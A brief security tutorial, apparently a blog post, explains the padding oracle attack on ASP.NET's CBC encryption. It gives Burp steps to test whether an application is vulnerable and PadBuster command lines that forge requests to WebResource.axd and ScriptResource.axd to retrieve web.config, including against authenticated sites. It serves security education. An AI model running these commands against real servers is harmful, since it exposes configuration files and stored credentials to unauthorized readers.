In cryptography, the padding oracle attack is an attack on the CBC mode of operation, where the server leaks data about whether the padding of an encrypted message is correct or not. oracle refers to a mechanism in cryptography that can be used to determine whether a test has passed or failed. This information would help an attacker to decrypt and encrypt data without key.
How to find your .NET application is vulnerable to padding oracle attack or not?
- Using burp proxy capture a request to webresource.axd file
- Change one character in the d value and send the request to the server. Observe the response.
- Send request to a non existent aspx page on the server. Observe the response.
- Response 2 and response 3 are differ, then it is possible to exploit the attack.
My OWASP presentation on 20-Aug-2011:
padbuster tool can be used to automate the padding oracle attack. This tool is a free ware and you can download it from – https://github.com/GDSSecurity/PadBuster/blob/master/padBuster.pl
* Perl is required to run padbuster. Perl can be downloaded from
Padbuster usage to attack .NET applications
- Encrypt web.config file
padBuster.pl http://somesite.com/WebResource.axd?d=AAAAAAAAAAAAAAAAAAAAAA2 AAAAAAAAAAAAAAAAAAAAAA2 16 -encoding 3 -plaintext "|||~/web.config
- Brute force the first block (supply the encrypted value generated in step 1 as d value to the ScriptResource.axd)
padBuster.pl http://www.myapp.com/ScriptResource.axd?d=iJBC6whziIIWQhKYX4KDpwAAAAAAAAAAAAAAAAAAAAA1 iJBC6whziIIWQhKYX4KDpwAAAAAAAAAAAAAAAAAAAAA1 16 -encoding 3 -bruteforce –log
- Observe the log, it will display a lot of 200 ok messages & URLs. Grab the URL which has highest content-length and paste it in the browser. It displays the web.config content.
* If its an authenticated website add cookies to the padbuster using -cookies option.